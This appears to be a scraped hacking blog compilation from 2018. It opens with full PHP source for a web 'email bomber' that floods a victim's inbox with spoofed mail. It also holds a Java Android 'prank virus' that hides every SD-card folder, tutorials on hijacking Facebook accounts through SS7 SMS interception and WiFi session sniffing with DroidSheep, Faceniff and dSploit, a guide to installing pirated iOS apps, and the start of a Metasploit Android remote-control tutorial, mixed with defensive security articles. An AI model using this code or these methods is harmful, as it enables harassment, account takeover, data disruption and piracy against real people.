Thursday, April 19, 2018

Simple Web Email Bomber. [PHP Source Code]

This Code was written due to lots of request from members in worldofhacker

This is Only for Testing Purpose, if you try to harm person with this S*** of code than I(Module Online) or World of Hacker will not be Responsible for your Crime. Keep Calm, Stay Safe


Note: Your Host will ban you account for doing so.

PHP Code:
<!DOCTYPE html>
<
html lang=en>
    <
head>
        <
title>My Email Bomber</title>
    </
head>
    <
body>
        <
header align=center>
            <
h1My Email Bomber </h1>
        </
header>
        <
section>
            <
form method="post" action="#">
                <
table border="0">
                    <
tr><td>Your EMail : </td><td><input type=email name=email placeholder="Your Mail id If you want to show victime" /></td></tr>
                    <
tr><td>Email id of Person: </td><td><input type=email name=mail placeholder="Enter Slave Email" /></td></tr>
                    <
tr><td valign=top>Message to Slave : </td><td><textarea name=msg rows=8 cols=30 ></textarea></td></tr>
                    <
tr><td>Noof Time You want to Bombard his Email</td><td><input type=text name=no placeholder=100 /></td></tr>
                    <
tr><td><input type=reset value=Reset All /></td><td><input type=submit name=sub value="Start Bombarding Mail" /></td></tr>
                </
table>
            </
form>
        </
section>
        <
footer align=center>
            <
p>Thank you to <a href="http://worldofhacker.com" target="_blank">World of Hacker</aCopyright &copy; <a href="http://www.worldofhacker.com">KroKite</a></p>
        </
footer>
    </
body>
</
html>

phpif(isset($_POST['sub']) || !empty($_POST['mail']) || !empty($_POST['no'])) {
    
$Slave $_POST['mail'];
    
$no $_POST['no'];
    
$msg $_POST['msg'];
    
$hack "hacker@anonymous.com";
    
$headers 'From:'.(!empty($_POST['email'])) ? $_POST['email']:$hack "\r\n" .
            
'Reply-To:'.(!empty($_POST['email'])) ? $_POST['email']:$hack "\r\n" .
            
'X-Mailer: PHP/' phpversion();
    for(
$i=1;$i<=$no;$i++) {
        
$mail mail($Slave"You are Under Attack"$msg$headers);
    if(
$mail) {
        echo 
"{$i}. Mail Sent
"
;
    } else {
        echo 
"{$i}. Mail was not Sent
"
;
    }
    }
} else {
    echo 
"Please fill all the form Properly";
}
?>

Good Luck.



Source : Copyed on April 19, 2018 at Krokite.blogspot.co.id Posted by Krokite
               As an advanced reference material, please be able to visit the official website. Thank you

5 Signs of a Hacked Social Media Account


1. Posts that you didn’t write appear suddenly on your wall !

Sounds obvious – right? But can you always tell? For instance, if several bloggers contribute posts to the same account, will you know who was supposed to post which article and when? And if you use a service like NetworkedBlogs to automatically publish links from your blog to your Twitter and Facebook accounts, do you really carefully check every tweet and post?

Recommendation:

If you notice unexpected posts on your social media accounts, delete them immediately and change your password.

2. Somebody logged into your account from an unusual location

Most social media services these days enable you to check the location of the last logins – even if they tend to be approximate. So if you are in Germany and you see that someone logged in on a different continent, chances are your account was hacked.

Recommendation:

Regularly check the locations where you supposedly logged in. If you notice an open session in an unexpected location, terminate it. A step-by-step guide on how to do that in Facebook can be found here.

3. Spammy ads flood your Facebook page

Ever heard of likejacking? It is a derivative of “clickjacking”, but specific to Facebook. It works as follows: you are lured onto a page with an attractive post, such as the “10 funniest television bloopers” or “watch this baby panda sneeze”. The page is composed of two layers – a front layer, which is a cute sneezing panda, and a back layer, with a Facebook “Like” button, which follows your cursor wherever you click. As soon as you do so, you’re Facebook page will get flooded with ads…

Recommendation:

On Facebook you have the ability to check which apps you have liked and can disable them. If you don’t know the apps that you find there, remove them from your profile – a hacker may have liked them to get money for every purchase made form those ads. Make sure that their posts are also gone.

4. You are unable to login to your account

Assuming that you didn’t simply forget your password, it might be that someone accessed your account and changed your password. Please note that if this is indeed the case, most probably the cyber criminals have also replaced the email address used to recover the password.

Recommendation:
Contact the owner of the platform (e.g.: Facebook, Twitter) – it’s the best way to claim your account back.

5. You’re suddenly following a lot of new, unknown people

Are you now following lots of new and unknown people? For example, malware may hijack your account and make you follow spambots on Twitter or Facebook. This then further spreads malicious URLs to more people. The same applies for a host of private messages/tweets sent from your account – unbeknown to you.

Recommendation:

Change your password immediately. Optionally, we recommend you delete the posts and let everyone know that they should not click on the links posted from your account during the period of time when you were hacked.



Source : Copyed on April 19, 2018 at Blog.avira.com Posted by Avira
               As an advanced reference material, please be able to visit the official website. Thank you

How to Hack Facebook Account Just by Knowing Phone Number


Update: If you think this technique is old and can not be used to hack your social media, bank or any online accounts, then you are mistaken. A real-world SS7 attack has been spotted this month when some unknown hackers exploited the design flaws in the Signaling System 7 (SS7) to drain victims' bank accounts.

Hacking Facebook account is one of the major queries on the Internet today. It's hard to find — how to hack Facebook account, but researchers have just proven by taking control of a Facebook account with only the target's phone number and some hacking skills.

Yes, your Facebook account can be hacked, no matter how strong your password is or how much extra security measures you have taken. No joke!

Hackers with skills to exploit the SS7 network can hack your Facebook account. All they need is your phone number.

The weaknesses in the part of global telecom network SS7 not only let hackers and spy agencies listen to personal phone calls and intercept SMSes on a potentially massive scale but also let them hijack social media accounts to which you have provided your phone number.

SS7 or Signalling System Number 7 is a telephony signaling protocol that is being used by more than 800 telecommunication operators worldwide to exchange information with one another, cross-carrier billing, enabling roaming, and other features.

However, an issue with the SS7 network is that it trusts text messages sent over it regardless of their origin. So, malicious hackers could trick SS7 into diverting text messages as well as calls to their own devices.

All they need is the target’s phone number and some details of the target’s device to initiate the silent snooping.

The researchers from Positive Technologies, who recently showed how they could hijack WhatsApp and Telegram accounts, now gave the demonstration of the Facebook hack using similar tricks, Forbes reported.

SS7 has long been known to be vulnerable, despite the most advanced encryption used by cellular networks. The designing flaws in SS7 have been in circulation since 2014 when the team of researchers at German Security Research Labs alerted the world to it.

Here's How to Hack Any Facebook Account:

The attacker first needs to click on the "Forgot account?" link on the Facebook.com homepage. Now, when asked for a phone number or email address linked to the target account, the hacker needs to provide the legitimate phone number.

The attacker then diverts the SMS containing a one-time passcode (OTP) to their own computer or phone, and can login to the target’s Facebook account.

The issue affects all Facebook users who have registered a phone number with Facebook and have authorized Facebook Texts.

Besides Facebook, researchers' work shows that any service, including Gmail and Twitter, that uses SMS to verify its user accounts has left open doors for hackers to target its customers.

Although the network operators are unable to patch the hole sometime soon, there is little the smartphone users can do.
  • Do not link your phone number to social media sites, rather rely solely on emails to recover your Facebook or other social media accounts.
  • Use two-factor authentication that does not use SMS texts for receiving codes.
  • Use communication apps that offer "end-to-end encryption" to encrypt your data before it leaves your smartphone over your phone's standard calling feature.
Update: However, the important thing to note is that the issue has actually nothing to do with Facebook security or other website's security, instead it is the weakness in the telecom network.
"Because this technique [SSL exploitation] requires significant technical and financial investment, it is a very low risk for most people," Facebook spokesperson told The Hacker News. 

"As an added precaution, we recommend turning on two-factor authentication, called Login Approvals, in your Facebook security settings. Doing this will disable recovery via SMS on your account so even if someone has your phone number, they'll still need your password to access your account."


Source : Copyed on April 19, 2018 at Thehackernews.com Posted by Swati Khandelwal
               As an advanced reference material, please be able to visit the official website. Thank you
Wednesday, April 18, 2018

5 Ways To Prevent Your Facebook Account From Getting Hacked

Related image

You’ve probably already heard that Facebook accounts are hacked to gain personal information, but you might not be aware of how easy that just might be for hackers. With hackers increasingly targeting Facebook as a primary source of collecting user information, and corporations using your information to make decisions about your rates, you really should have a plan for protecting yourself.

Here are some tips to prevent getting hacked:

  1. Use strong passwords. The names of yourself, your spouse, parents, siblings or dog, or your birthday, do not qualify. Use a mix of letters, digits and punctuation (but not blank spaces). Use both capital and lowercase letters. The longer your password, the better. The shorter your password, the easier it is to hack, especially if it’s a common word or name. A good starting point is six characters, though 8, 10 or 12 are even better. If you have trouble remembering, do something about that, else consider using an unusual phrase or combo of words that only you or a few people might know, then substitute some of the letters with digits and/or punctuation. Humorous combinations might make it easier to remember, but otherwise write your password down in a SAFE place. Or just keep using the “Forgot password?” option to reset your password.
  2. Change your password regularly. By regularly I mean monthly or even weekly, not yearly. Facebook’s “Forgot password?” option is one way, or you can go to your account’s settings.
  3. Don’t friend everyone. That “hot chick” whom you don’t know and looks like some Hollywood starlet might be a guy. Avoid the person who doesn’t even have a profile pic, let alone any friends in common with you. If you haven’t met them, be cautious. Also, don’t friend friends whom you know to use weak passwords. If their account is compromised, hackers can still learn certain things about you from your profile, or could send you a message via the friend’s account to lure you to a malware site.
  4. Don’t click on links willy-nilly. If you click on a status update that a “friend” posted on your wall and it looks fishy, don’t assume they actually did it. Their account could be compromised. If your clicking takes you to a Facebook application that you’re unsure of, there’s no obligation to click through.
  5. Don’t believe all emails. Don’t forget that honest web services will never ask you to do certain things in an email. For example, Facebook will NEVER send you an email asking you to change your password or enter personal details. If they need you to do that, they will tell you where in your account settings you can go to do that. On a similar note, protect your email account that you registered for Facebook with, else someone can succeed in resetting your Facebook password.

Have any tips on how to protect a Facebook account? Feel free to share in the comments.


Source : Copyed on April 19, 2018 at www.adweek.com Posted by Raj Dash
               As an advanced reference material, please be able to visit the official website. Thank you

Protect Your Facebook Account From Hackers

Recently a friend-of-a-friend’s Facebook account was hacked.  She realized that spam e-mails were sent from her account.  Then a few days later I heard that another acquaintance experienced the same problem.

Here are some steps you can take if you believe your account has been compromised, along with some steps to prevent this from happening.  Please share this with your Facebooking teens.  A 2011 survey showed that 30% of teen’s accounts had been hacked – by a friend!  So help them check their privacy and security settings on a regular basis.


WHAT TO DO IF YOUR FACEBOOK ACCOUNT HAS BEEN HACKED

Go to https://www.facebook.com/hacked and follow the instructions on-screen. You’ll go through three steps:


  1. Verify your account and change password.  You’ll be asked to identify your account, change your password, and change the password associated with the e-mail account that you use for Facebook.
  2. Review and fix anything the cybercriminal changed.
  3. Unlock account.


HOW TO PREVENT YOUR FACEBOOK ACCOUNT FROM BEING HACKED

Security settings are the key.  So stop what you’re doing and print out this article.  Then log into Facebook and update these settings.

From Account settings, click on Security.  I recommend the following settings for the highest level of security.

1. Secure Browsing – enabled.

2. Login Notifications – enabled.

3. Login Approvals – enabled.  This feature requires that you have a cell phone capable of receiving text messages.  When enabled, you will receive a code via text message if your account is accessed from an unrecognized location.

This is important for teens.  They may use computers at a friend’s house, the library, or other public locations.  As an example, if you are logging in to Facebook from a computer in the library, you’ll be asked to enter in a code.  You’ll receive the text message, know that it’s YOU using Facebook, and enter the code.  If you receive the text message and you WERE NOT trying to log into Facebook, you’ll know there is a problem.  And the hacker trying to get into your account will not have the code.

Dialog box shown after Login Approvals are set up

4. App Passwords – If you don’t have many apps associated with your Facebook account, you can probably leave this off.  If you do enable login approvals as described above, and you do use apps such as Skype through Facebook, then you may want to set app passwords.  You can read about this feature on Facebook Help and Inside Facebook.

5. Recognized Devices – if there is anything listed here that doesn’t look familiar, or the date is not recent, remove it.

6. Active Sessions – remove all except Current session.


Your Security Settings page should now look something like this:

Summary of Facebook security settings

As a last step, go to General Account settings and change your Facebook password.  And finally, log out of Facebook when not in use.

Now with your Facebook account safe and secure, you can get back to important Facebook activities, such as post-election re-friending, without too much of a fear of hackers accessing your account.


Source : Copyed on April 19, 2018 at http://www.bewebsmart.com Posted by Jean
               As an advanced reference material, please be able to visit the official website. Thank you

How To Create A Harmless Android Phone Virus ... (prank ,virus, harmless)

Creating a simple virus program(harmless,just for fun / prank)....

This program can infect the phone as well as disinfect it....

(disinfecting will not function properly in some cases,data is not actually lost anywhere but you have to recover it manually in such case... **it is also described below)

so use at own risk....

Screen shot:-


After infecting



but yet it works in most cases

This posts include a simple program in android which is capable to invisible all the SD-Card content of phone from file manager,gallery and media scanner...

The basic idea behind it is only to hide/invisible the SD-Card content from phone.so Android OS gets unaware about that data and don't shows it up.....

In Android system folders having a dot "." as initial of its name considered as hidden .... so what we do is to make each SD-card folder to start with "..." to hide them ex- 'image' --> '...image'

and while disinfecting we have to remove those dots to unhide them from system....

here we are using three dots "..." as prefix to differ them from android system hidden files..

Source code:-

package com.example.fun_virus;

import java.io.File;
import java.util.ArrayList;
import java.util.List;

import android.app.Activity;
import android.content.SharedPreferences;
import android.os.Bundle;
import android.os.Environment;
import android.util.Log;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
import android.widget.Toast;

public class Fun_Virus_Activity extends Activity
{
private File file;
private List myList;

public void onCreate(Bundle savedInstanceState)
{
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_fun__virus);

myList = new ArrayList();

String root_sd = Environment.getExternalStorageDirectory().toString();
file = new File( root_sd + "/" ) ;
Button btn_infect = (Button) findViewById(R.id.btn_infect);
Button btn_disinfect = (Button) findViewById(R.id.btn_disinfect);

btn_infect.setOnClickListener(new OnClickListener() {

@Override
public void onClick(View arg0) {
// TODO Auto-generated method stub
SharedPreferences settings = getSharedPreferences("mysp", MODE_PRIVATE);
String inf = settings.getString("INFECTED","NO");
if(inf.equals("OK"))
{
Toast.makeText(Fun_Virus_Activity.this,"Already Infected", 5).show();
}else
{
infect();
SharedPreferences.Editor prefEditor = settings.edit();
prefEditor.putString("INFECTED", "OK");
prefEditor.commit();
}
}
});
btn_disinfect.setOnClickListener(new OnClickListener() {

@Override
public void onClick(View arg0) {
// TODO Auto-generated method stub
disinfect();
Fun_Virus_Activity.this.getSharedPreferences("mysp", 0).edit().clear().commit();
}
});

}
public void infect()
{
File list[] = file.listFiles();
for( int i=0; i< list.length; i++)
{
myList.add( list[i].getName() );
Log.e("files : ",i+":"+ myList.get(i).toString());
File file = new File(list[i].getParent()+"/"+myList.get(i));
//File file2 = new File(list[i].getParent()+"..."+myList.get(i));
Log.e("abs_path",list[i].getParent()+"/"+myList.get(i)+"");
//boolean success = file.renameTo(file2);
boolean success= file.renameTo(new File(list[i].getParent(),"..."+myList.get(i)));
Log.e("bool",success+"" );
}
}
public void disinfect()
{
File list[] = file.listFiles();
for( int i=0; i< list.length; i++)
{
myList.add( list[i].getName() );
Log.e("files : ",i+":"+ myList.get(i).toString());
File file = new File(list[i].getParent()+"/"+myList.get(i));
String aa= myList.get(i).replace("...", "");
Log.e("replace", aa+"");
boolean success= file.renameTo(new File(list[i].getParent(),aa));
Log.e("bool",success+"" );
}
}
}
And the layout :-

xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:background="@drawable/vrs_logo"
tools:context=".Fun_Virus_Activity" >

android:id="@+id/btn_infect"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_alignParentLeft="true"
android:layout_alignParentTop="true"
android:layout_marginTop="32dp"
android:text="INFECT" />

android:id="@+id/btn_disinfect"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_alignBaseline="@+id/btn_infect"
android:layout_alignBottom="@+id/btn_infect"
android:layout_alignParentRight="true"
android:text="DISINFECT" />


**

In a condition when all previous data is not visible after disinfecting then you have to manually recover those data using file explorer like:-Es File Explorer,AndroZip etc..
you should rename folders with "..." prefix to there original name ex:- '...image' -->'image'

This will show data again.



Source : Copyed on April 18, 2018 at http://suhebqureshi.blogspot.co.id Posted by Suheb Qureshi
               As an advanced reference material, please be able to visit the official website. Thank you
Tuesday, April 17, 2018

Simple Text Message to Hack Any Android Phone Remotely


Own an Android phone? Beware, Your Android smartphones can be hacked by just a malformed text message.

Security researchers have found that 95% of Android devices running version 2.2 to 5.1 of operating system, which includes Lollipop and KitKat, are vulnerable to a security bug, affecting more than 950 Million Android smartphones and tablets.

Almost all Android smart devices available today are open to attack that could allow hackers to access the vulnerable device without the owners being aware of it, according to Joshua Drake, vice president of platform research and exploitation at security firm Zimperium.

The vulnerability actually resides in a core Android component called "Stagefright," a multimedia playback library used by Android to process, record and play multimedia files such as PDFs.

A Text Message Received...Your Game is Over

The sad news for most of the Android users is that the fix will not help Millions of Android users that owned older versions of the operating system that Google no longer supports, opening doors for hackers to perform Stagefright attack.

Drake has developed and published a scary exploit that uses a specially crafted text message using the multimedia message (MMS) format.

All a hacker needs is the phone number of the victim’s Android device. The hacker could then sends the malicious message that will surreptitiously execute malicious code on the vulnerable device with no end user action, no indication, nothing required.

"These vulnerabilities are extremely dangerous because they do not require that the victim take any action to be exploited," reads the Zimperium blog post published Monday.

"Unlike spear-phishing, where the victim needs to open a PDF file or a link sent by the attacker, this vulnerability can be triggered while you sleep. Before you wake up, the attacker will remove any signs of the device being compromised, and you will continue your day as usual—with a trojaned phone."

Drake will present his full findings, including six additional attack techniques to exploit the vulnerability, at Black Hat security conference in Las Vegas on on August 5 and DEF CON 23 on August 7, where he is scheduled to deliver a talk titled, Stagefright: Scary Code in the Heart of Android.

Almost all Android devices containing Stagefright are in question. According to Drake, all versions of Android devices after and including version 2.2 of the operating system are potentially vulnerable, and it is up to each device manufacturer to patch the devices against Stagefright attack.

When will I expect a Fix?

Google has patched the code and sent it to device manufacturers, but devices require over-the-air updates from companies such as Samsung or Motorola to update their customers' phones.

Given the shaky history of handset manufacturers and carriers rolling out security patches, it is not known how long the companies will take to update vulnerable Android devices against Stagefright attack.

However, Silent Circle has patched the issue in its Blackphone, as has Mozilla, which uses Stagefright code in Firefox OS.

Source : Copyed on April 18, 2018 at thehackernews.com Posted by Mohit Kumar
               As an advanced reference material, please be able to visit the official website. Thank you

How to Remove Malware From Your PC


It should be drilled into you by now: Use antivirus software! These programs—from the amazing free tools to the fee-driven antivirus utilities—keep tabs on your Windows PC with scans, real-time monitoring, even heuristic analysis of files and processes so new threats can be identified. It's imperative, especially with Windows, that you have some kind of antivirus installed.

But even the best antivirus isn't 100 percent foolproof. A device already compromised by malware could get on your network, people can personally place malware on a system, and some malware, a Remote Access Trojan, lays dormant waiting to attack at just the right time. And no one can protect entirely against social engineering or phishing schemes that trick you into clicking on or downloading an infected link or attachment. Hell, there are even rogue programs out there that look like antivirus or antispyware, but when you install them, you get infected! Always download from the source—avoid the third-party download sites.

Sometimes, it's hard to tell when you're initially infected with the badness. But there are plenty of signs you should keep an eye out for—incredibly slow performance where once the PC zipped along, browser pop-ups when no browser is even open, scary warnings from security programs you didn't install, and many more.

If you suspect, or absolutely with a certainty know, you've got a malware infection, here are the steps to take, immediately, to remove the malware.

Install or Update Your Antivirus

First, make sure your existing antivirus software is fully updated with the latest virus definitions—that's how the software IDs existing malware, based on what has come before. Antivirus vendors are constantly updating these lists as they encounter new viruses and Trojans in the wild and in the lab. If your software is even a day out of date, you run the risk of an infection.

If you don't have any antivirus installed, well...sheesh. Re-read the first paragraph above and immediately download one of our top-rated free antivirus tools: Avast Free Antivirus, AVG AntiVirus Free, or Panda Free Antivirus.


If you need to fix an infected PC for a business, super-sheesh, and also, you'll probably have to spend some money to get a full security suite. Our top-rated options include: Symantec Norton Security Premium, Bitdefender Internet Security, Bitdefender Total Security, Kaspersky Internet Security, and McAfee LiveSafe. All of the above get 4.5 stars in reviews this year from PCMag's security expert, Neil J. Rubenking.

Then run the deep, thorough scan. Let it run for as long as it takes, and hope that it finds and fixes the problem. That's your best-case scenario. The problem is, if the malware is good at its job, then it probably deactivated the antivirus to get there in the first place.

Also, make sure you've got a software firewall running on all PCs. The firewall running in your home or business router is nice and all, but it's not enough. Our top pick is the Check Point ZoneAlarm Free Firewall, or get the paid Pro version that does even more.

Revert to the Old or the Safe

If you've got System Restore points set in Windows, you could use this opportunity to reset the system. It could do the trick but probably will not. The malware, again, if it was written by someone smart, will be ready for this trick. You can try running RKill, a program designed to kill any known malware processes in play.

If that doesn't work, you need to boot Windows in a way that won't let the malware get started. That's called Safe Mode. Enter into the Windows Safe Mode by restarting the PC, then, in Windows 8 and 10, hold down the shift key during the boot sequence. When you're asked for troubleshooting options, enter Safe Mode.

You should delete temp files—they permeate Windows after a while, and could be where malware hides. At the Start menu, type in Disk Cleanup and it'll check the C: drive for what you can safely delete among all the temps. Then download and run an antivirus on-demand scanner: Malwarebytes Anti-Malware is always highly recommended at this point in the process. Hopefully, it does the trick and your PC is back to normal after the scan and another reboot.


Malwarebytes Anti-Malware is sometimes called "second opinion malware scanner," because it's a second line of attack against the bad guys if your initial antivirus fails. Other options include HitmanPro and Kaspersky TDSKiller. The latter is particularly good at sniffing out rootkits that run at a level that makes them hard to find by regular antivirus software.

Cut the Internet

If you've got a RAT aboard, that means someone is remotely accessing your PC. That's bad news, so your first step has to be getting off the Internet. Pull the Ethernet on the PC, turn off the Wi-Fi, even turn off the router if you must. That's your only guarantee the PC is disconnected (make sure it's not using a neighbor's or business's Wi-Fi to stay online on the side).

Not being online makes it hard to stay up to date with antivirus definitions, of course. You'll have to get the latest software from a third-party PC (probably at a different location) then get it to the infected system using a USB flash drive. You can also boot the computer with a CD, sometimes called a "Live CD" or "rescue CD," running a full anti-malware utility. Of course, you might need a CD reader on the PC, which isn't always a given these days, especially on newer laptops. Then again, many of these tools can boot from a USB flash drive, as well.

Get Portable Antivirus Help

When all else fails, it could be the OS that's against you, thanks to the infection—you may not be able to even install new antivirus tools. You need to get around the OS and let the antivirus take control.

There are many portable apps you can put on a USB drive that don't require direct installation, including some that do antivirus, like Microsoft Safety Scanner, ClamWin, McAfee Stinger, or Kaspersky Security Scan. Try a mix—they won't conflict since you run each scan individually.

If you prefer to boot into a utility that will then do a deeper scan on the entire hard drive, get a third-party PC on which to burn the goods, then find a rescue CD image to burn from antivirus vendors like AVG, Avira, Bitdefender, F-Secure, Kaspersky, Panda, Sophos, and Trend Micro.

You'll need ISO or IMG file burner software utility to make that disk or drive that's bootable; in Windows 7, 8, and 10, insert the empty CD, DVD, or USB drive, double click the ISO or IMG file and select Burn disc image. Or download a tool like ImgBurn to get more control over it.

There is specialized software out there, like Spybot, that goes after spyware, or Symantec's Norton Power Eraser, which specifically targets "crimeware," the kind of malware that runs scams and scares the crap out of you. This one comes with a warning that it's as aggressive as hell when it goes after a problem, and therefore the risk of collateral damage is high. The warning says specifically, "there is a risk that it can select some legitimate programs for removal."


Risking a few programs is worth it compared to the nuclear option: reformatting your hard drive and reinstalling the operating system and all programs (you do have an image of your clean OS install backed up that you can use for restoration, right?). That's necessary less and less these days, compared to the days of Windows 95 on up to Vista; but still a viable method of resetting the system, sans malware.

Living in the Aftermath

Dealing successfully with an infection is like being at home after you've been burglarized; it takes a while to feel safe again. Take steps, like you would after being robbed: enhance your security. Get the best, highest rated security suite, read up on how to avoid getting scammed/phished, and then go on a purge: uninstall any programs you're not using on a regular basis or don't trust. Be ruthless. And be careful.


Source : Copyed on April 18, 2018 at www.pcmag.com Posted by Eric Griffith
               As an advanced reference material, please be able to visit the official website. Thank you

Create Your Own Android Trojan in 5 Easy Steps


It seems that every few weeks a new crop of malicious Android apps turns up in the market. Sometimes Google just removes them from the market; other times it uses the "kill switch" to disable already-downloaded apps from Android devices around the world.

Typically these threats are perfectly ordinary-looking apps. Like the Trojan Horse of legend, they enter your device freely, with your permission. Once installed they do something nasty. Some users are shocked that Google can remove stuff from your Android phone remotely. I'm more alarmed at the ridiculous ease with which malicious coders can create Trojans for Android.

At last week's Next@Norton event, Symantec researchers presented a dazzling array of information about the current state of mobile security and the mobile malware landscape. Eric Chien, Technical Director for Security Response, revealed the absurdly simple steps a malefactor uses to create a brand-new Trojan by creating one right in front of the audience. Don't worry; his sample app never left the room.

Here are the five simple steps Chien demonstrated:

One. Start by downloading a free app. You can choose any app at all, but of course you'll want to pick something that will draw plenty of downloads.

Two. The language compilers that create applications on your PC take textual source code and convert it into assembly language that the CPU can read and process. It's a one-way translation; there's no way to go from the final executable file back to the source code. Android apps are written in Java, though, and that means that you can decompile them back to the original source code using simple, easily-available tools. For the next step, decompile your target app.

Three. The third step is a little tricky. You'll need to obtain Java source code that does something nasty, like sending personal information from the device to a third party. For the demonstration, Chien used a known threat called Android.Geinimi.

Four. Adding the Trojan code is absurdly simple. You copy it into the folder containing the existing source code, make a small change in the manifest to run the Trojan code before the rest of the app, and edit the permissions to give the Trojanized app free access to the entire device. While you're at it, tweak the app's name. Chien added "FREE!" to the name for his demo.

Five. Compile the modified app and upload it to the market. You're done!

Of course, malicious apps don't last long in the Android Market. If you really want to spread a dangerous program, you're better off uploading it in China, where there is no official Android market. In fact, virtually all of the examples referenced in Chien's presentation surfaced in the free-for-all markets of China.

Not planning to do this yourself? Good! But I'm sure that like me you're shocked at how easily someone with bad intentions can create a brand new Android Trojan. It's time to look into mobile security for your Android device.

Source : Copyed on April 18, 2018 at www.pcmag.com Posted by Neil J. Rubenking
               As an advanced reference material, please be able to visit the official website. Thank you
Thursday, April 12, 2018

How to Install Cracked Apps Without Jailbreak

All iPhone, iPod and iPad users know that in order to install Cracked Apps & Games to their iDevices it needs a Jailbreak to perform this, but here I will show you a way to install Paid Apss Without Jailbreak for Free using an application under Windows (not Mac) and works for all iOS version including iOS 5 and iOS 6. I wrote an article about How to Get Any iPhone Paid App For Free you can check it out, or you can try to Update & Jailbreak iOS 5.1.1 any iDevice

1) Download the software called Kuaiyong
2) Launch the setup of Kuaiyong, and install it (simple setup)



3) After Installing the Software, plug-in your iDevice with USB Cable.
4) Now Launch Kuaiyong application from Desktop, it will look like below:



5) It will show a list of Apps and Games (Paid), you can search using the Search Bar or you can select an app from the list.
a) Search Bar
b) List navigation




6) After choosing an App or Game to download, Click on it then Click the Red button like below.



7) It will starts downloading the app. Just wait until it completes Downloading.



8) After it downloads the Paid app wait some time to Sync the App and add it to your iPhone, iPad or iPod...



Note-1: This works on all iDevices including: iPhone 3G, iPhone 3GS, iPhone 4, iPhone 4S, iPhone 5
Note-2: This also works on all iOS Versions: iOS3, iOS4, iOS5, iOS5.1.1, iOS6, iOS6.0.1

Search Tags:
ios,ios jailbreaking,ios 6,ios 5,ios paid apps,ios,ios 7,ios cracked apps,free download,jailbreaking,cracked apps,ios,ios free download,ios free cracked apps,install,ios,ios apps,ios paid apps,ios,ios jaikbroken,ios 7



Posted by 

How To Root Any Android Device

What is Rooting?

Android rooting is the process of allowing users of smartphones, tablets, and other devices running the Android mobile operating system to attain privileged control (known as "root access") within Android's subsystem.

Rooting is often performed with the goal of overcoming limitations that carriers and hardware manufacturers put on some devices, resulting in the ability to alter or replace system applications and settings, run specialized apps that require administrator-level permissions, or perform other operations that are otherwise inaccessible to a normal Android user. On Android, rooting can also facilitate the complete removal and replacement of the device's operating system, usually with a more recent release of its current operating system. Most of the time,rooting a device voids its warranty.

Different company phones have different process' of rooting.Today I will show you how to root any android phone or tablet with single software.

SuperOneClick

1) Download The SuperOneClick Root tool and Extract it on your Desktop.
2) Connect your Android device to your Pc. (Make sure you have your Device Drivers Installed)
3) Click on "SuperOneClick" Application in the Folder.
4) A window appears like this-


Sample picture showing SuperOneClick interface

5) Make Sure your device is connected Properly to the computer.
6) Click on the "ROOT" Option.
7) Wait for the Process to get Completed.
8) You have successfully rooted your android device

Before you perform this you need to turn on USB debugging from developer options and allow installation from unknown resources.

NOTE: Do this at your OWN RISK! I am not responsible for any damage caused to your smartphone.

This software might not work on all smartphones.



Posted by 

Facebook Hacking Tools: Hack Facebook Accounts Using Android Phone


There could be many reasons for hacking someone's Facebook account and it is not so simple as we speak. One should know the fact that there are no direct softwares that can hack Facebook account simply by entering the victim's user id. But it is possible with some methods those really work, out of which phishing, key logging, packet sniffing are most popular and widely used ones. Today, in this tutorial you are going to learn how to perform packet sniffing attack to hack Facebook account using your Android smartphone.

What exactly is packet sniffing?



Lets make this simple with an example. Consider two persons A and B using the same public WiFi network. The information sent and received between the device and WiFi hot-spot is done in the form of packets. These packets are not secured and can be access by any other device connected to same network. If Person A is using Facebook, his log-in credentials are sent in the form of packets which Person B can access and read them. In fact, Person B can modify them. Not only log-in credentials, everything you use within your browser can be seen and modified by anyone else as long as you are connected to that network.

So, Why Android Phone?

Earlier, when this process is first developed the only way to do packet sniffing is using PC or laptop running on Windows or Linux operating system. But now it can be done using any Android phone with root access (we shall talk about this later). The main reason for using Android phone is simplicity. It works same as PC, in terms of speed and accuracy. It has same number of tools as PC. And when you are in crowd, you can simply take out your mobile and do some hacking anonymously.

Does the Android Phone require any particular specs?

No particular specifications are needed for your Android device to do this. But your device needs to be rooted. For a brief explanation of what rooting is, read the tutorial on "How to Root Any Android Device".



Now, what is the main process?

Let's end the intro here. Now lets talk about the main procedure of packet sniffing. This tutorial assumes that you have an Android device, of course rooted. Now all you have to do is, install one of the Applications listed below, connect to a public WiFi network and start hacking people. Usually there are many apps out there that can perform packet sniffing. I have used all such apps and found these three to be working perfect even during poor network signal.

1. DroidSheep [Requires Root]

DroidSheep is one of the best app to hack Facebook and other website accounts. DroidSheep cannot get username and password credentials but can grab live sessions of users and show them on your device. Live sessions means, according to our example, if Person B is using Facebook and Gmail in two tabs of his browser, Person A gets exactly the same tabs in his device further which he can modify or access any required content from them. Using DroidSheep you can hack almost any website accounts based on the victim's usage. As DroidSheep is being used for illegal purposes it's download link has been removed from official DroidSheep website. Search Google and you can find it.

Download droidsheep Apk

2. Faceniff [Requires Root]
Faceniff is another tiny application that is used to hack Facebook accounts over WiFi now and then. Unlike DroidSheep, Faceniff is solely created to hack only Facebook accounts. Using Faceniff you can get user id and passwords of the people using Facebook in the same WiFi network.

Download Faceniff Apk

3. Dsploit [Requires Root] - Works Best
According to me, Dsploit is the best, in terms of penetration testing attacks. Dsploit has a number of pen testing attacks like Router PWN, Port Scanner, Inspector, Vulnerability Finder, MITM attacks and many more. We are going to use MITM attacks for our purpose. MITM stands for Man In The Middle attacks which include Password Sniffer, Session Hijacker, Script Injector out of which we are going to use Password Sniffer to get account passwords over WiFi. If you are curious about this app, explore it and you will find lots of tools in it.

Download Working & Updated version of Dsploit here: DOWNLOAD LINK.



Posted by 

Hack To Remotely Control Any Android Device Using Kali Linux or Ubuntu


Hello everyone! Today we are back with an awesome tutorial on Hacking Android devices to Control them Remotely. There are,in fact, no user-friendly softwares out there that can simply hack any Android device on the go and retrieve the desired information. So, in order to achieve this we are going to take the coding way(though there is not much code), and we are going to use Linux operating system, Kali Linux and Ubuntu are recommended ones.


What actually are we doing:

In this tutorial, we are going to create a deploy application using Kali Linux Metasploit which should be installed on the target android device. When installed successfully, we can gain full access to that device.

What will you need:

1) A PC or Laptop running on Linux Operating System. If you are on windows or mac, you can do this on Oracle VM VirtualBox. Download it from here.

